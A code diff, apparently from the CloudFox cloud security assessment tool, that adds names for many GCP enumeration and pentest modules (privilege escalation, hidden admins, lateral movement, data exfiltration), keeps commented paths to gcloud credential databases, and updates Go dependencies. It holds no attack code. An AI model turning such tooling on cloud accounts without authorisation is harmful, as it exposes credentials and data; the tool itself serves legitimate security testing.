@@ package globals // Module names -// const GCP_WHOAMI_MODULE_NAME = "whoami" const GCP_ARTIFACT_RESGISTRY_MODULE_NAME string = "artifact-registry" const GCP_BIGQUERY_MODULE_NAME string = "bigquery" -const GCP_BUCKETS_MODULE_NAME string = "buckets" +const GCP_STORAGE_MODULE_NAME string = "storage" const GCP_INSTANCES_MODULE_NAME string = "instances" const GCP_IAM_MODULE_NAME string = "iam" +const GCP_PERMISSIONS_MODULE_NAME string = "permissions" const GCP_SECRETS_MODULE_NAME string = "secrets" const GCP_WHOAMI_MODULE_NAME string = "whoami" +// New module names +const GCP_FUNCTIONS_MODULE_NAME string = "functions" +const GCP_CLOUDRUN_MODULE_NAME string = "cloudrun" +const GCP_CLOUDSQL_MODULE_NAME string = "cloudsql" +const GCP_GKE_MODULE_NAME string = "gke" +const GCP_PUBSUB_MODULE_NAME string = "pubsub" +const GCP_KMS_MODULE_NAME string = "kms" +const GCP_SERVICEACCOUNTS_MODULE_NAME string = "serviceaccounts" +const GCP_LOGGING_MODULE_NAME string = "logging" +const GCP_NETWORKS_MODULE_NAME string = "networks" +const GCP_FIREWALL_MODULE_NAME string = "firewall" +const GCP_DNS_MODULE_NAME string = "dns" +const GCP_SCHEDULER_MODULE_NAME string = "scheduler" +const GCP_ORGANIZATIONS_MODULE_NAME string = "organizations" +const GCP_APIKEYS_MODULE_NAME string = "apikeys" +const GCP_EXPOSURE_MODULE_NAME string = "exposure" +const GCP_CLOUDBUILD_MODULE_NAME string = "cloudbuild" +const GCP_DATAFLOW_MODULE_NAME string = "dataflow" +const GCP_COMPOSER_MODULE_NAME string = "composer" +const GCP_MEMORYSTORE_MODULE_NAME string = "memorystore" +const GCP_FILESTORE_MODULE_NAME string = "filestore" +const GCP_SPANNER_MODULE_NAME string = "spanner" +const GCP_BIGTABLE_MODULE_NAME string = "bigtable" +const GCP_VPCSC_MODULE_NAME string = "vpc-sc" +const GCP_WORKLOAD_IDENTITY_MODULE_NAME string = "workload-identity" +const GCP_IDENTITY_FEDERATION_MODULE_NAME string = "identity-federation" +const GCP_ASSET_INVENTORY_MODULE_NAME string = "asset-inventory" +const GCP_LOADBALANCERS_MODULE_NAME string = "loadbalancers" +const GCP_VPCNETWORKS_MODULE_NAME string = "vpc-networks" +const GCP_NOTEBOOKS_MODULE_NAME string = "notebooks" +const GCP_DATAPROC_MODULE_NAME string = "dataproc" +const GCP_IAP_MODULE_NAME string = "iap" +const GCP_BEYONDCORP_MODULE_NAME string = "beyondcorp" +const GCP_ACCESSLEVELS_MODULE_NAME string = "access-levels" + +// Pentest modules +const GCP_HIDDEN_ADMINS_MODULE_NAME string = "hidden-admins" +const GCP_KEYS_MODULE_NAME string = "keys" +const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys" +const GCP_PRIVESC_MODULE_NAME string = "privesc" +const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies" +const GCP_STORAGEENUM_MODULE_NAME string = "storage-enum" +const GCP_LOGGINGENUM_MODULE_NAME string = "logging-enum" +const GCP_BIGQUERYENUM_MODULE_NAME string = "bigquery-enum" +const GCP_BIGTABLEENUM_MODULE_NAME string = "bigtable-enum" +const GCP_SPANNERENUM_MODULE_NAME string = "spanner-enum" +const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project" +const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources" +const GCP_PUBLICACCESS_MODULE_NAME string = "public-access" +const GCP_SOURCEREPOS_MODULE_NAME string = "source-repos" +const GCP_SSHOSLOGIN_MODULE_NAME string = "ssh-oslogin" +const GCP_SERVICEAGENTS_MODULE_NAME string = "service-agents" +const GCP_DOMAINWIDEDELEGATION_MODULE_NAME string = "domain-wide-delegation" +const GCP_PRIVATESERVICECONNECT_MODULE_NAME string = "private-service-connect" +const GCP_CLOUDARMOR_MODULE_NAME string = "cloud-armor" +const GCP_CERTMANAGER_MODULE_NAME string = "cert-manager" + +// Resource IAM module +const GCP_RESOURCEIAM_MODULE_NAME string = "resource-iam" + +// New security analysis modules (Azure equivalents) +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +// Verbosity levels (matching Azure pattern) +var GCP_VERBOSITY int = 0 + +const GCP_VERBOSE_ERRORS = 9 + // const GCP_INVENTORY_MODULE_NAME string = "inventory" // const GCP_GCLOUD_REFRESH_TOKENS_DB_PATH = ".config/gcloud/credentials.db" // const GCP_GCLOUD_ACCESS_TOKENS_DB_PATH = ".config/gcloud/access_tokens.db" diff --git a/globals/utils.go b/globals/utils.go index cec516ae..ad1dabb0 100644 --- a/globals/utils.go +++ b/globals/utils.go @@ -4,4 +4,4 @@ const CLOUDFOX_USER_AGENT = "cloudfox" const CLOUDFOX_LOG_FILE_DIR_NAME = ".cloudfox" const CLOUDFOX_BASE_DIRECTORY = "cloudfox-output" const LOOT_DIRECTORY_NAME = "loot" -const CLOUDFOX_VERSION = "1.17.0" +const CLOUDFOX_VERSION = "2.0.0" diff --git a/go.mod b/go.mod index 7e1bec1b..dd9b1238 100644 --- a/go.mod +++ b/go.mod @@ -87,9 +87,12 @@ require ( require ( cel.dev/expr v0.25.1 // indirect + cloud.google.com/go/accesscontextmanager v1.9.7 // indirect cloud.google.com/go/auth v0.17.0 // indirect cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect - cloud.google.com/go/monitoring v1.24.3 // indirect + cloud.google.com/go/orgpolicy v1.15.1 // indirect + cloud.google.com/go/osconfig v1.15.1 // indirect + cloud.google.com/go/pubsub/v2 v2.0.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.54.0 // indirect @@ -122,6 +125,7 @@ require ( github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 // indirect github.com/spiffe/go-spiffe/v2 v2.6.0 // indirect github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect + go.opencensus.io v0.24.0 // indirect go.opentelemetry.io/auto/sdk v1.2.1 // indirect go.opentelemetry.io/contrib/detectors/gcp v1.39.0 // indirect go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.64.0 // indirect @@ -137,6 +141,11 @@ require ( ) require ( + cloud.google.com/go/asset v1.22.0 + cloud.google.com/go/kms v1.23.2 + cloud.google.com/go/monitoring v1.24.3 + cloud.google.com/go/pubsub v1.50.1 + cloud.google.com/go/securitycenter v1.38.1 github.com/aws/aws-sdk-go-v2/service/kms v1.49.4 golang.org/x/oauth2 v0.34.0 google.golang.org/api v0.257.0 @@ -209,5 +218,5 @@ require ( golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 // indirect - google.golang.org/grpc v1.77.0 // indirect + google.golang.org/grpc v1.77.0 ) diff --git a/go.sum b/go.sum index 6f23c6f7..699fb8a7 100644 --- a/go.sum +++ b/go.sum @@ -1,9 +1,14 @@ cel.dev/expr v0.25.1 h1:1KrZg61W6TWSxuNZ37Xy49ps13NUovb66QLprthtwi4= cel.dev/expr v0.25.1/go.mod h1:hrXvqGP6G6gyx8UAHSHJ5RGk//1Oj5nXQ2NI02Nrsg4= +cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.123.0 h1:2NAUJwPR47q+E35uaJeYoNhuNEM9kM8SjgRgdeOJUSE= cloud.google.com/go v0.123.0/go.mod h1:xBoMV08QcqUGuPW65Qfm1o9Y4zKZBpGS+7bImXLTAZU= +cloud.google.com/go/accesscontextmanager v1.9.7 h1:aKIfg7Jyc73pe8bzx0zypNdS5gfFdSvFvB8YNA9k2kA= +cloud.google.com/go/accesscontextmanager v1.9.7/go.mod h1:i6e0nd5CPcrh7+YwGq4bKvju5YB9sgoAip+mXU73aMM= cloud.google.com/go/artifactregistry v1.18.0 h1:4qQIM1a1OymPxCODgLpXJo+097feE0i9pwpof98SimQ= cloud.google.com/go/artifactregistry v1.18.0/go.mod h1:UEAPCgHDFC1q+A8nnVxXHPEy9KCVOeavFBF1fEChQvU= +cloud.google.com/go/asset v1.22.0 h1:81Ru5hjHfiGtk+u/Ix69eaWieKpvm7Ce7UHtcZhOLbk= +cloud.google.com/go/asset v1.22.0/go.mod h1:q80JP2TeWWzMCazYnrAfDf36aQKf1QiKzzpNLflJwf8= cloud.google.com/go/auth v0.17.0 h1:74yCm7hCj2rUyyAocqnFzsAYXgJhrG26XCFimrc/Kz4= cloud.google.com/go/auth v0.17.0/go.mod h1:6wv/t5/6rOPAX4fJiRjKkJCvswLwdet7G8+UGXt7nCQ= cloud.google.com/go/auth/oauth2adapt v0.2.8 h1:keo8NaayQZ6wimpNSmW5OPc283g65QNIiLpZnkHRbnc= @@ -16,16 +21,28 @@ cloud.google.com/go/datacatalog v1.26.1 h1:bCRKA8uSQN8wGW3Tw0gwko4E9a64GRmbW1nCb cloud.google.com/go/datacatalog v1.26.1/go.mod h1:2Qcq8vsHNxMDgjgadRFmFG47Y+uuIVsyEGUrlrKEdrg= cloud.google.com/go/iam v1.5.3 h1:+vMINPiDF2ognBJ97ABAYYwRgsaqxPbQDlMnbHMjolc= cloud.google.com/go/iam v1.5.3/go.mod h1:MR3v9oLkZCTlaqljW6Eb2d3HGDGK5/bDv93jhfISFvU= +cloud.google.com/go/kms v1.23.2 h1:4IYDQL5hG4L+HzJBhzejUySoUOheh3Lk5YT4PCyyW6k= +cloud.google.com/go/kms v1.23.2/go.mod h1:rZ5kK0I7Kn9W4erhYVoIRPtpizjunlrfU4fUkumUp8g= cloud.google.com/go/logging v1.13.1 h1:O7LvmO0kGLaHY/gq8cV7T0dyp6zJhYAOtZPX4TF3QtY= cloud.google.com/go/logging v1.13.1/go.mod h1:XAQkfkMBxQRjQek96WLPNze7vsOmay9H5PqfsNYDqvw= cloud.google.com/go/longrunning v0.7.0 h1:FV0+SYF1RIj59gyoWDRi45GiYUMM3K1qO51qoboQT1E= cloud.google.com/go/longrunning v0.7.0/go.mod h1:ySn2yXmjbK9Ba0zsQqunhDkYi0+9rlXIwnoAf+h+TPY= cloud.google.com/go/monitoring v1.24.3 h1:dde+gMNc0UhPZD1Azu6at2e79bfdztVDS5lvhOdsgaE= cloud.google.com/go/monitoring v1.24.3/go.mod h1:nYP6W0tm3N9H/bOw8am7t62YTzZY+zUeQ+Bi6+2eonI= +cloud.google.com/go/orgpolicy v1.15.1 h1:0hq12wxNwcfUMojr5j3EjWECSInIuyYDhkAWXTomRhc= +cloud.google.com/go/orgpolicy v1.15.1/go.mod h1:bpvi9YIyU7wCW9WiXL/ZKT7pd2Ovegyr2xENIeRX5q0= +cloud.google.com/go/osconfig v1.15.1 h1:QQzK5njfsfO2rdOWYVDyLQktqSq9gKf2ohRYeKUuA10= +cloud.google.com/go/osconfig v1.15.1/go.mod h1:NegylQQl0+5m+I+4Ey/g3HGeQxKkncQ1q+Il4DZ8PME= +cloud.google.com/go/pubsub v1.50.1 h1:fzbXpPyJnSGvWXF1jabhQeXyxdbCIkXTpjXHy7xviBM= +cloud.google.com/go/pubsub v1.50.1/go.mod h1:6YVJv3MzWJUVdvQXG081sFvS0dWQOdnV+oTo++q/xFk= +cloud.google.com/go/pubsub/v2 v2.0.0 h1:0qS6mRJ41gD1lNmM/vdm6bR7DQu6coQcVwD+VPf0Bz0= +cloud.google.com/go/pubsub/v2 v2.0.0/go.mod h1:0aztFxNzVQIRSZ8vUr79uH2bS3jwLebwK6q1sgEub+E= cloud.google.com/go/resourcemanager v1.10.7 h1:oPZKIdjyVTuag+D4HF7HO0mnSqcqgjcuA18xblwA0V0= cloud.google.com/go/resourcemanager v1.10.7/go.mod h1:rScGkr6j2eFwxAjctvOP/8sqnEpDbQ9r5CKwKfomqjs= cloud.google.com/go/secretmanager v1.16.0 h1:19QT7ZsLJ8FSP1k+4esQvuCD7npMJml6hYzilxVyT+k= cloud.google.com/go/secretmanager v1.16.0/go.mod h1://C/e4I8D26SDTz1f3TQcddhcmiC3rMEl0S1Cakvs3Q= +cloud.google.com/go/securitycenter v1.38.1 h1:D9zpeguY4frQU35GBw8+M6Gw79CiuTF9iVs4sFm3FDY= +cloud.google.com/go/securitycenter v1.38.1/go.mod h1:Ge2D/SlG2lP1FrQD7wXHy8qyeloRenvKXeB4e7zO6z0= cloud.google.com/go/storage v1.58.0 h1:PflFXlmFJjG/nBeR9B7pKddLQWaFaRWx4uUi/LyNxxo= cloud.google.com/go/storage v1.58.0/go.mod h1:cMWbtM+anpC74gn6qjLh+exqYcfmB9Hqe5z6adx+CLI= cloud.google.com/go/trace v1.11.7 h1:kDNDX8JkaAG3R2nq1lIdkb7FCSi1rCmsEtKVsty7p+U= @@ -84,6 +101,7 @@ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1 h1:WJ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1/go.mod h1:tCcJZ0uHAmvjsVYzEFivsRTN00oz5BEsRgQHu5JZ9WE= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0 h1:XRzhVemXdgvJqCH0sFfrBUTnUJSBrBf7++ypk+twtRs= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0/go.mod h1:HKpQxkWaGLJ+D/5H8QRpyQXA1eKjxkFlOMwck5+33Jk= +github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 h1:sBEjpZlNHzK1voKq9695PJSX2o5NEXl7/OL3coiIY0c= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0/go.mod h1:P4WPRUkOhJC13W//jWpyfJNDAIpvRbAUIYLX/4jtlE0= github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 h1:lhhYARPUu3LmHysQ/igznQphfzynnqI3D75oUyw1HXk= @@ -240,6 +258,7 @@ github.com/bishopfox/awsservicemap v1.1.0 h1:MM+rmGsXjkBtFR1IlS+GpVKR2srGr+V4l/J github.com/bishopfox/awsservicemap v1.1.0/go.mod h1:oy9Fyqh6AozQjShSx+zRNouTlp7k3z3YEMoFkN8rquc= github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb h1:ot96tC/kdm0GKV1kl+aXJorqJbyx92R9bjRQvbBmLKU= github.com/bishopfox/knownawsaccountslookup v0.0.0-20231228165844-c37ef8df33cb/go.mod h1:2OnSqu4B86+2xGSIE5D4z3Rze9yJ/LNNjNXHhwMR+vY= +github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/charmbracelet/bubbles v0.21.0 h1:9TdC97SdRVg/1aaXNVWfFH3nnLAwOXr8Fn6u6mfQdFs= @@ -258,12 +277,14 @@ github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91 h1:payR github.com/charmbracelet/x/exp/golden v0.0.0-20241011142426-46044092ad91/go.mod h1:wDlXFlCrmJ8J+swcL/MnGUuYnqgQdW9rhSD61oNMb6U= github.com/charmbracelet/x/term v0.2.2 h1:xVRT/S2ZcKdhhOuSP4t5cLi5o+JxklsoEObBSgfgZRk= github.com/charmbracelet/x/term v0.2.2/go.mod h1:kF8CY5RddLWrsgVwpw4kAa6TESp6EB5y3uxGLeCqzAI= +github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= github.com/clipperhouse/displaywidth v0.6.1 h1:/zMlAezfDzT2xy6acHBzwIfyu2ic0hgkT83UX5EY2gY= github.com/clipperhouse/displaywidth v0.6.1/go.mod h1:R+kHuzaYWFkTm7xoMmK1lFydbci4X2CicfbGstSGg0o= github.com/clipperhouse/stringish v0.1.1 h1:+NSqMOr3GR6k1FdRhhnXrLfztGzuG+VuFDfatpWHKCs= github.com/clipperhouse/stringish v0.1.1/go.mod h1:v/WhFtE1q0ovMta2+m+UbpZ+2/HEXNWYXQgCt4hdOzA= github.com/clipperhouse/uax29/v2 v2.3.0 h1:SNdx9DVUqMoBuBoW3iLOj4FQv3dN5mDtuqwuhIGpJy4= github.com/clipperhouse/uax29/v2 v2.3.0/go.mod h1:Wn1g7MK6OoeDT0vL+Q0SQLDz/KpfsVRgg6W7ihQeh4g= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5 h1:6xNmx7iTtyBRev0+D/Tv1FZd4SCg8axKApyNyRsAt/w= github.com/cncf/xds/go v0.0.0-20251210132809-ee656c7534f5/go.mod h1:KdCmV+x/BuvyMxRnYBlmVaq4OLiKW6iRQfvC62cvdkI= github.com/cpuguy83/go-md2man/v2 v2.0.6/go.mod h1:oOW0eioCTA6cOiMLiUPZOpcVxMig6NIQQ7OS05n1F4g= @@ -275,12 +296,16 @@ github.com/dimchansky/utfbom v1.1.1 h1:vV6w1AhK4VMnhBno/TPVCoK9U/LP0PkLCS9tbxHdi github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/j0mACtrfE= github.com/dominikbraun/graph v0.23.0 h1:TdZB4pPqCLFxYhdyMFb1TBdFxp8XLcJfTTBQucVPgCo= github.com/dominikbraun/graph v0.23.0/go.mod h1:yOjYyogZLY1LSG9E33JWZJiq5k83Qy2C6POAuiViluc= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329 h1:K+fnvUM0VZ7ZFJf0n4L/BRlnsb9pL/GuDG6FqaH+PwM= github.com/envoyproxy/go-control-plane v0.13.5-0.20251024222203-75eaa193e329/go.mod h1:Alz8LEClvR7xKsrq3qzoc4N0guvVNSS8KmSChGYr9hs= github.com/envoyproxy/go-control-plane/envoy v1.36.0 h1:yg/JjO5E7ubRyKX3m07GF3reDNEnfOboJ0QySbH736g= github.com/envoyproxy/go-control-plane/envoy v1.36.0/go.mod h1:ty89S1YCCVruQAm9OtKeEkQLTb+Lkz0k8v9W0Oxsv98= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0 h1:/G9QYbddjL25KvtKTv3an9lx6VBE2cnb8wp1vEGNYGI= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0/go.mod h1:Wk+tMFAFbCXaJPzVVHnPgRKdUdwW/KdbRt94AzgRee4= +github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/envoyproxy/protoc-gen-validate v1.3.0 h1:TvGH1wof4H33rezVKWSpqKz5NXWg5VPuZ0uONDT6eb4= github.com/envoyproxy/protoc-gen-validate v1.3.0/go.mod h1:HvYl7zwPa5mffgyeTUHA9zHIH36nmrm7oCbo4YKoSWA= github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4= @@ -313,16 +338,37 @@ github.com/golang-jwt/jwt/v4 v4.5.2 h1:YtQM7lnr8iZ+j5q71MGKkNw9Mn7AjHM68uc9g5fXe github.com/golang-jwt/jwt/v4 v4.5.2/go.mod h1:m21LjoU+eqJr34lmDMbreY2eSTRJ1cv77w39/MY0Ch0= github.com/golang-jwt/jwt/v5 v5.3.0 h1:pv4AsKCKKZuqlgs5sUmn4x8UlGa0kEVt/puTpKx9vvo= github.com/golang-jwt/jwt/v5 v5.3.0/go.mod h1:fxCRLWMO43lRc8nhHWY6LGqRcf+1gQWArsqaEUEa5bE= +github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/groupcache v0.0.0-20200121045136-8c9f03a8e57e/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da h1:oI5xCqsCo564l8iNU+DwB5epxmsaqB+rhGL0m5jtYqE= +github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= +github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/google/flatbuffers v25.9.23+incompatible h1:rGZKv+wOb6QPzIdkM2KxhBZCDrA0DeN6DNmRDrqIsQU= github.com/google/flatbuffers v25.9.23+incompatible/go.mod h1:1AeVuKshWv4vARoZatz6mlQ0JxURH0Kv5+zNeJKJCa8= +github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/martian/v3 v3.3.3 h1:DIhPTQrbPkgs2yJYdXU/eNACCG5DVQjySNRNlflZ9Fc= github.com/google/martian/v3 v3.3.3/go.mod h1:iEPrYcgCF7jA9OtScMFQyAlZZ4YXTKEtJ1E6RWzmBA0= github.com/google/s2a-go v0.1.9 h1:LGD7gtMgezd8a/Xak7mEWL0PjoTQFvpRudN895yqKW0= github.com/google/s2a-go v0.1.9/go.mod h1:YA0Ei2ZQL3acow2O62kdp9UlnvMmU7kA6Eutn0dXayM= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/enterprise-certificate-proxy v0.3.7 h1:zrn2Ee/nWmHulBx5sAVrGgAa0f2/R35S4DJwfFaUPFQ= @@ -380,6 +426,7 @@ github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10/go.mod h1 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= @@ -403,6 +450,7 @@ github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UV github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= +github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U= github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U= @@ -413,8 +461,12 @@ github.com/zeebo/assert v1.3.0 h1:g7C04CbJuIDKNPFHmsk4hwZDO5O+kntRxzaUoNXj+IQ= github.com/zeebo/assert v1.3.0/go.mod h1:Pq9JiuJQpG8JLJdtkwrJESF0Foym2/D9XMU5ciN/wJ0= github.com/zeebo/xxh3 v1.0.2 h1:xZmwmqxHZA8AI603jOQ0tMqmBr9lPeFwGg6d+xy9DC0= github.com/zeebo/xxh3 v1.0.2/go.mod h1:5NWz9Sef7zIDm2JHfFlcQvNekmcEl9ekUZQQKCYaDcA= +go.einride.tech/aip v0.73.0 h1:bPo4oqBo2ZQeBKo4ZzLb1kxYXTY1ysJhpvQyfuGzvps= +go.einride.tech/aip v0.73.0/go.mod h1:Mj7rFbmXEgw0dq1dqJ7JGMvYCZZVxmGOR3S4ZcV5LvQ= go.mongodb.org/mongo-driver v1.17.6 h1:87JUG1wZfWsr6rIz3ZmpH90rL5tea7O3IHuSwHUpsss= go.mongodb.org/mongo-driver v1.17.6/go.mod h1:Hy04i7O2kC4RS06ZrhPRqj/u4DTYkFDAAccj+rVKqgQ= +go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= +go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= go.opentelemetry.io/auto/sdk v1.2.1 